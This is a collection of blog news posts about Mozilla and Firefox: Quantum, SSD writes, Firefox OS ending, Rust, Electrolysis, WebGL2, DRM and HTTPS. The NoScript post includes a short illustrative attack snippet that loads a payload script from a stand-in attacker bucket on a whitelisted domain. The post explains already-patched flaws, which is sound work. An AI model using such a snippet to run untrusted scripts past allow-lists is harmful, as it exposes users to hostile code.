Mozilla Unveils Quantum Project

Subject: General Tech | October 30, 2016 - 01:09 AM |
Tagged: mozilla, servo, gecko, firefox

One of the big announcements at Mozilla Summit 2013, despite Firefox OS being the focus of the event, was their research (with Samsung) into a new rendering engine, Servo. Rendering HTML5 is horrifically complex, so creating a new rendering engine from scratch is a big “nope!” for basically all organizations. Mozilla saw big potential here, because current engines are very difficult to scale across multiple cores, so they went into it as a no-assumptions experiment.

mozilla-architecture.jpg

At the time, they didn't know whether Servo would be built up into a full rendering engine, or whether it would be picked apart and pulled back into their current engine, Gecko. Mozilla has now unveiled Quantum, and the first sentence of its MozillaWiki entry is “Quantum is not a new web browser.” They go on to say that they will be “building on the Gecko engine as a solid foundation”. So it seems pretty clear that Servo will be picked apart, with mature components folded into Gecko, like they've recently done with their media file parser in Firefox 48.

While this likely won't have the major performance impact that a “boom, new engine” moment would, this piecewise method should deliver results sooner than building Servo up into a complete engine. Mozilla expects that big changes will begin to land next year.

Source: Mozilla

About the "Firefox Is Eating Your SSD" Story

Subject: Storage | October 5, 2016 - 07:57 PM |
Tagged: ssd, mozilla, google, firefox, endurance, chrome

A couple of weeks ago, I saw a post pop up on Twitter a few times about Firefox performing excessive writes to SSDs, totaling up to 32GB in a single day. The author attributes it mostly to a fast-updating session restore feature, although cookies were also resource hogs in their findings. In an update, they also tested Google Chrome, which, itself, clocked in at over 24GB of writes in a day.
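If session restore is indeed the culprit, its write frequency is user-tunable. As a minimal sketch, assuming the default 15-second save interval is what generates the churn, you can raise it in about:config or a user.js file in your profile folder:

```typescript
// user.js: raise the session-save interval from the default 15 seconds to
// 5 minutes, trading crash-recovery freshness for fewer disk writes.
user_pref("browser.sessionstore.interval", 300000); // value is in milliseconds
```

Note that this only throttles one of the write sources the author identified; cookie traffic would be unaffected.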

mozilla-2016-donothurt.png

This, of course, seemed weird to me. I would have thought that at least one browser vendor would notice an issue like this. Still, I passed the link to Allyn because he is much better equipped to replicate these results. In our internal chat at the time, he was less skeptical than I was. I've since followed up with him, and he said that his initial results “wasn't nearly as bad as their case”. He'll apparently elaborate on tonight's podcast, and I'll update this post with his findings.

Mozilla Discontinues Firefox OS for All Devices

Subject: General Tech, Mobile | September 29, 2016 - 02:15 AM |
Tagged: mozilla, Firefox OS, firefox

Update: There has been a little confusion. The web browser, Firefox, is still going strong. In fact, they're focusing their engineering efforts more on it by cutting back on these secondary projects.

Less than a year after their decision to stop developing and selling smartphones through carriers, Mozilla has decided to end all commercial development of Firefox OS. Releases after Firefox OS 2.6 will be handled by third parties, such as Panasonic, should they wish to continue using it for their smart TV platform. Further, source code for the underlying operating system, Boot-to-Gecko (B2G), will be removed from their repository, mozilla-central, so it doesn't hinder development of their other products.

Mozilla_Foundation_201x_logo.png

Obviously, this is quite disappointing from a platform standpoint. Many applications, especially for mobile and similar devices, can be created with Web standards. At this point, we usually get comments about how web browsers shouldn't be app platforms, and that JavaScript is too inefficient. The thing is, the Web is about the best ubiquitous platform we have, and it will only get better with initiatives such as WebAssembly. Also, native applications don't necessarily perform better than Web-based ones, especially if the latter are packaged standalone (versus sharing resources with other tabs in a browser).

Regardless, Mozilla needs to consider their long-term financial stability, and throwing resources at Firefox OS apparently doesn't return enough value, either directly or through its impact on society.

Source: Mozilla

Mozilla Launches Firefox 49

Subject: General Tech | September 20, 2016 - 04:51 PM |
Tagged: mozilla, firefox

While it was originally scheduled for last week, some last-minute issues prevented the software non-profit organization from releasing it until today. Also, for some reason, Firefox for Android doesn't want to update from within itself, but triggering an update from the Google Play store works. This might be temporary and/or happen with every Firefox for Android update; I'm new to this platform.

Mozilla_Firefox_logo_2013.png

This version is expected to expand their multi-process support, which separates UI updates from site updates. Typically, Firefox disables the feature when add-ons are installed, because add-ons are given tools that can make decoupling these two spaces... glitchy. Under typical conditions, JavaScript and other tasks that run in the page shouldn't affect the browser's interface. You can see how this could be a problem if, for instance, an add-on loops between tasks on both sides at the same time. As such, Mozilla is pulling access to a few APIs when multi-process is enabled.

With Firefox 49, VentureBeat is reporting that Mozilla is allowing a “small initial set of compatible add-ons” to be enabled alongside multi-process. If you don't have any incompatible add-ons installed, then you should see Multiprocess Windows enabled in about:support. Otherwise, it will be disabled and you won't see any difference.
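If you'd rather query this from code than eyeball about:support, here's a rough sketch for Firefox's privileged Browser Console (Ctrl+Shift+J). It assumes the chrome-only Services object, which regular web pages do not get:

```typescript
// Browser Console only (chrome-privileged); not available to web content.
declare const Services: any; // supplied by Firefox's chrome environment
// browserTabsRemoteAutostart reports whether multi-process (e10s) is active.
console.log("e10s enabled:", Services.appinfo.browserTabsRemoteAutostart);
```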

Interestingly, Mozilla is promoting "Refresh Firefox" on their site if you have the latest version. This basically cleans all the add-ons out of your user profile, but maintains browsing history, bookmarks, and the like. It might have been around for a while but, if it's new, it times nicely with the multi-process rollout. On top of clearing out old, crufty add-ons, a user should see a bigger jump when Mozilla's multi-process enhancements are (I'm guessing) enabled.

Mozilla has changed a few other things here and there, too. While many of our readers will probably have hardware acceleration for video, they have just added SSSE3 optimizations for when GPU support isn't available. I'm not sure of all the use cases for this, but I'd expect it to help in virtualized environments and on certain older PCs (e.g., Intel Atom and VIA Nano). I'm just speculating, though.

Source: Mozilla

Mozilla to Publish First Rust-based Module in Firefox 48

Subject: General Tech | July 16, 2016 - 05:41 PM |
Tagged: mozilla, Rust, firefox

Mozilla has been working on the Rust language for several years now. It is designed to be extremely fast, memory-safe, and easy to parallelize on multi-core processors, achieving this with a compiler that's not afraid to tell you “Nope.” Mozilla (and others, like Samsung) want a language with those characteristics because it will make for an extremely fast, yet secure, web browser (although there are a lot of single-threaded design choices tangled into the Web specifications).

mozilla-rust.png

The first example will arrive next month for Windows (64-bit OS X and Linux already have it). Firefox 48 will replace a small portion of the code, originally written in C++, with a Rust-based equivalent. The affected component parses media files, extracting values like track ID, duration, resolution, and so forth. Because it's written in Rust, this ingestion should be resilient to memory-based vulnerabilities.

This probably will not be noticeable to end-users, but it's a few thousand fewer lines of code that Mozilla needs to worry about being used to hijack the browser. Mozilla is also planning to bring URL parsing over to Rust, which Servo already has. You would think that the C++ code has been battle-hardened by now, but, I mean, 15-year-old open-source bugs do exist, hiding in plain sight.

Source: Mozilla

Mozilla Will Begin Electrolysis with Firefox 48

Subject: General Tech | June 9, 2016 - 01:08 AM |
Tagged: mozilla, firefox

Electrolysis (e10s) is Mozilla's codename for their multi-process initiative in Firefox. The main goal of this is to separate the content of the website from the user interface. This means that, if a site has long-running JavaScript or layout, Firefox will not lock up. This seems like a simple idea, except that it undoes over a decade of assumptions that were made during Firefox's development. Imagine, for instance, that you have an extension which modifies both the browser UI and the page content -- that's a single script that needs to run across multiple processes. Whoops!

Mozilla_Firefox_logo_2013.png

This roll-out won't necessarily be immediate, though. You can install Firefox 48 and, only some weeks later, have Electrolysis turned on retroactively. They are starting with about 1% of eligible users, and will ramp up to all eligible users over time, or even pull it back if alarm bells start to ring.

Speaking of eligible users, there are quite a few conditions that will prevent you from getting Electrolysis. Namely, if you use extensions (it's unclear whether they mean all extensions, or just ones that use certain APIs) then you will be kept on single-process. They don't specify why, but it could very well be the situation that I mentioned in the first paragraph.
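If you'd rather not wait for the lottery, the underlying preference can be flipped manually. A sketch, with the caveat that the staged rollout adds its own gating on top, so this alone may not stick on every install:

```typescript
// user.js: opt in to Electrolysis ahead of the staged rollout.
// Extra rollout-side checks may still override this on some installs.
user_pref("browser.tabs.remote.autostart", true);
```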

Firefox 48 is scheduled to be released in six weeks (the first week of August).

WebGL2 Is On Its Way

Subject: General Tech | December 31, 2015 - 10:25 PM |
Tagged: webgl2, webgl, mozilla, firefox

The Khronos Group created WebGL to bring a GPU-accelerated platform to web browsers. With a few minor differences, it is basically JavaScript bindings for OpenGL ES 2.0. It also drove a few additions to JavaScript itself, such as typed arrays, which let scripts view raw buffers of data with specific types in an unmanaged way. Basically every latest-version web browser supports it these days, and we're starting to see it used in interesting ways.
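Those raw-buffer additions are worth a quick illustration: typed arrays let you allocate one chunk of bytes and view it as whatever numeric type a GL call expects.

```typescript
// One untyped allocation, two typed views; no copying involved.
const raw = new ArrayBuffer(16);         // 16 raw bytes
const asFloats = new Float32Array(raw);  // viewed as 4 x 32-bit floats
const asBytes = new Uint8Array(raw);     // viewed as 16 individual bytes
asFloats[0] = 1.0;                       // writes through to the shared buffer
console.log(asBytes[3]);                 // 63 (0x3F): top byte of 1.0f, little-endian
```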

webgl2-2015-particles.jpg

The next step is WebGL2. OpenGL ES 3.0 adds a bunch of new features that are sorely needed for modern games and applications. For instance, it allows drawing to multiple render targets, which is very useful for virtual cameras in video games (although original WebGL could access this through the optional WEBGL_draw_buffers extension, where supported). The addition of “Uniform Buffer Objects” is a better example. This allows you to store a bunch of data, like view transformation matrices, as a single buffer that can be bound to multiple shader programs, rather than uploading the values one at a time for every draw that needs them.

It's hard to describe, but demos speak a thousand words.
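In that spirit, here is a minimal sketch of the Uniform Buffer Object flow; the block name "Camera" and the two programs are hypothetical stand-ins:

```typescript
// Assumed to exist already: a canvas plus two compiled-and-linked programs.
declare const programA: WebGLProgram;
declare const programB: WebGLProgram;
const canvas = document.querySelector("canvas")!;
const gl = canvas.getContext("webgl2")!;

// Upload the shared data (e.g., a 4x4 view-projection matrix) once...
const viewProj = new Float32Array(16);
const ubo = gl.createBuffer();
gl.bindBuffer(gl.UNIFORM_BUFFER, ubo);
gl.bufferData(gl.UNIFORM_BUFFER, viewProj, gl.DYNAMIC_DRAW);
gl.bindBufferBase(gl.UNIFORM_BUFFER, 0, ubo); // attach to binding point 0

// ...then point each program's "Camera" uniform block at binding point 0.
for (const program of [programA, programB]) {
  const blockIndex = gl.getUniformBlockIndex(program, "Camera");
  gl.uniformBlockBinding(program, blockIndex, 0);
}
```

Update that one buffer per frame and every program reading the "Camera" block sees the new matrices.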

The news today is that Mozilla Nightly now ships with WebGL2 enabled by default. It was previously hidden behind an option in the browser, disabled by default. This doesn't seem like a big deal, but one of the largest hurdles to WebGL2 is how the browsers actually implement it. The shading language in WebGL was simple enough that most browsers convert it to DirectX HLSL on Windows. This is said to have the added advantage of obfuscating the ability to write malicious code, since developers never directly write what's executed. GLSL in OpenGL ES 3.0 is much more difficult to translate. I'm not sure whether the browsers will begin to trust OpenGL ES 3.0 drivers directly, or whether they finally updated the GLSL translator, but a shipping implementation means that something was fixed.

Unfortunately, compute shaders (an OpenGL ES 3.1 feature) are not supported in WebGL2. That said, the biggest hurdle is, again, getting WebGL2 working at all. From my talks with browser vendors over the last year or so, it sounds like features (including compute shaders) should start flying in easily once this hurdle is cleared. From there, GPGPU in a website should be much more straightforward.

NoScript Whitelist Vulnerabilities Exploited

Subject: General Tech | July 6, 2015 - 07:01 AM |
Tagged: noscript, javascript, firefox

I do not really believe in disabling JavaScript, although the ability to control or halt execution would be nice, but you can use an extension to remove it entirely if you want. I say this because the upcoming story discusses vulnerabilities in the NoScript extension, which locks down JavaScript and other non-static content. By “vulnerabilities”, we mean the ability to execute JavaScript, which every major browser enables by default because, on its own, they consider it safe for their users.

NoScript.png

This is like a five-year-old figuring out how to unlock a fireworks case full of paper crackers.

Regardless, there are two vulnerabilities, both of which have already been patched. Both of them abuse the whitelist functionality so that malicious code gets waved through. By default, NoScript trusts a handful of domains, because blocking every script ever would break too much of the internet.

The first problem is that the whitelist has a little cruft, including domain names that are useless, and even some that have expired and become available for purchase. To prove a point, Matthew Bryant purchased zendcdn.net and used it to serve his own JavaScript. The second problem is similar, but slightly different. Rather than an expired domain, some whitelist entries, such as googleapis.com, have sub-domains, like storage.googleapis.com, that serve untrusted user scripts (it is part of Google's Cloud Platform).
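To make the second case concrete: with a whitelisted host, any page can pull a script from it and NoScript will let it run. A hypothetical sketch (the bucket and file names are invented):

```typescript
// Hypothetical attack page. storage.googleapis.com sat under a whitelisted
// domain, and anyone can serve files from their own bucket there, so
// NoScript would have allowed this script to execute.
const s = document.createElement("script");
s.src = "https://storage.googleapis.com/attacker-bucket/payload.js";
document.head.appendChild(s);
```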

Again, even though JavaScript is about as secure as you can get in an executable language, you should be allowed to control what executes on your machine. As stated, NoScript has already addressed these issues in a recent update.

Firefox 38 Launches with (and also without) DRM Support

Subject: General Tech | May 13, 2015 - 05:06 PM |
Tagged: mozilla, firefox, DRM

Mozilla has just released Firefox 38. With it comes the controversial Adobe Primetime DRM implementation through the W3C's Encrypted Media Extensions (EME). Or, maybe not. If you upgrade the browser through one of the default channels, the Adobe Primetime Content Decryption Module will appear in the Plugins tab of your Add-ons manager on Windows Vista or later (but it might take a few minutes after the upgrade).

Mozilla_Firefox_logo_2013.png

Alternatively, you can use Mozilla's EME-free installer for Firefox and avoid it altogether.
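For the curious, the EME surface a site actually touches is small. A hedged sketch of how a page would probe for Adobe's key system (the codec configuration is only an example):

```typescript
// Ask the browser whether the Adobe Primetime CDM is usable via EME.
navigator
  .requestMediaKeySystemAccess("com.adobe.primetime", [{
    initDataTypes: ["cenc"],
    videoCapabilities: [{ contentType: 'video/mp4; codecs="avc1.42E01E"' }],
  }])
  .then(() => console.log("Primetime CDM is available"))
  .catch(() => console.log("No such DRM here (perhaps the EME-free build)"));
```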

I have mentioned my concerns about DRM in the past. EME does not particularly bother me, because it is just a plugin architecture, but the fundamental concept does. Simply put, copy protection does very little good and a whole lot of bad. If your movie is leaked before it is legally available in consumers' hands, as regularly happens, then what do you expect to accomplish after the fact? It takes one instance to be copied infinitely, and that often comes from the film company's own supply chain, not their customers. Moreover, it has been found to reduce sales and hurt customer experience (above and beyond the valid ideological concerns).

Beyond the DRM inclusion, several new features were added. One of the more interesting ones is the BroadcastChannel API. This standard allows a web application to share data between “contexts” that have the same “user agent and origin”. In other words, it must be the same browser and the same app (even across secondary instances of it). This will allow sites to do things like multi-monitor split screen, which is useful for games and utilities.
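The API itself is tiny. A sketch, with an arbitrary channel name, of two same-origin windows talking without any server round-trip:

```typescript
// Window A: broadcast state to every same-origin context on this channel.
const sender = new BroadcastChannel("game-state"); // arbitrary channel name
sender.postMessage({ level: 3, score: 1200 });

// Window B (say, on a second monitor): receive it.
const receiver = new BroadcastChannel("game-state");
receiver.onmessage = (event) => console.log("got state:", event.data);
```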

WebRTC has also been upgraded with multistream and renegotiation support. Even though the general public thinks of WebRTC as a webcam and voice chat standard, it actually allows arbitrary data channels. For example, “BananaBread” is a first-person shooter that used WebRTC to synchronize multiplayer state. Character and projectile positions are very much not webcam or audio data, but WebRTC doesn't care.
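A rough sketch of that arbitrary-data use, with the offer/answer signaling exchange omitted for brevity:

```typescript
// Game state over a WebRTC data channel; signaling setup not shown.
const pc = new RTCPeerConnection();
const channel = pc.createDataChannel("positions", { ordered: false }); // stale updates may drop
channel.onopen = () => channel.send(JSON.stringify({ player: 1, x: 20, y: 35 }));
channel.onmessage = (event) => console.log("peer state:", JSON.parse(event.data));
```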

Firefox 38 launched on May 12th with an optional EME-free build.

Source: Mozilla

Forcing HTTPS Is Being Discussed

Subject: General Tech | April 14, 2015 - 08:08 PM |
Tagged: mozilla, http, https, firefox

On the Mozilla Dev-Platform newsgroup, hosted at Google Groups, a proposal to deprecate insecure HTTP is being discussed. The idea is that HTTPS needs to be adopted, and organizations will not do it without being pushed. The plan is to get browser vendors to refuse to activate new features, and eventually to disable old features, unless the site is loaded as a “privileged context”.

22-mozilla-2.jpg

This has sparked a debate, which was the whole point of course, about how secure we want the Web to be. What features should we retroactively disable unless they are used over HTTPS? Things that access your webcam and microphone? Things that write to your hard drive? Then there is the question of how to handle self-signed certificates, which provide encryption without verification, and so forth.
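From a page's perspective, this kind of gating has a natural shape. A sketch (the camera check is just an example of the sort of feature that could be withheld):

```typescript
// Pages can ask whether they were loaded in a secure ("privileged") context.
if (window.isSecureContext) {
  // HTTPS (or localhost): powerful APIs like camera access stay on the table.
  navigator.mediaDevices.getUserMedia({ video: true })
    .then((stream) => console.log("camera granted:", stream.id))
    .catch(() => console.log("camera denied"));
} else {
  console.warn("Insecure HTTP: new features may be withheld here.");
}
```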

Note: Websites cannot access or create files on your hard drive, but standards like localStorage and IndexedDB allow websites to have their own spaces for persistence. This is to allow, for instance, a 3D game to cache textures (and so forth) so you don't need to download them every time.
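As a tiny sketch of that caching pattern (the key and URL are hypothetical, and a real game would favor IndexedDB for large binary data):

```typescript
// Cache a small, string-encoded asset so repeat visits skip the download.
async function loadTextureDescription(): Promise<string> {
  const key = "texture:rock01";                                 // hypothetical key
  let data = localStorage.getItem(key);
  if (data === null) {
    data = await (await fetch("/textures/rock01.json")).text(); // hypothetical URL
    localStorage.setItem(key, data);
  }
  return data;
}
```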

Personally, this concerns me greatly. I started helping Mozilla a couple of years ago, a few weeks after I saw Microsoft's Windows 8 developer certification program. I do not like the thought of someone being able to stifle creation and expression, and the web was looking like it might be the last bastion of unrestricted development for the general public.

In the original Windows Store requirements, no browser could exist unless it was a skin of Trident. This meant that, if a site didn't work in Internet Explorer, it didn't exist. If you didn't want to play by their rules? Your app didn't get signed, and your developer certificate could even be revoked by Microsoft, or by someone with authority over them. You can imagine the problems an LGBT-focused developer might have in certain countries, even if Microsoft likes their creations.

This is obviously not as bad as that. In the Windows Store case, there was one authority, whereas HTTPS can be authenticated by numerous providers. Also, if self-signed certificates are deemed “secure enough”, it would likely avoid the problem. You would not need to ask one of a list of authorities for permission to exist; you could secure the connection yourself. Of course, that is a barrier of skill for many, and that is its own concern.

So we'll see, but I hope that Mozilla will take these concerns as a top priority in their decisions.

Source: Mozilla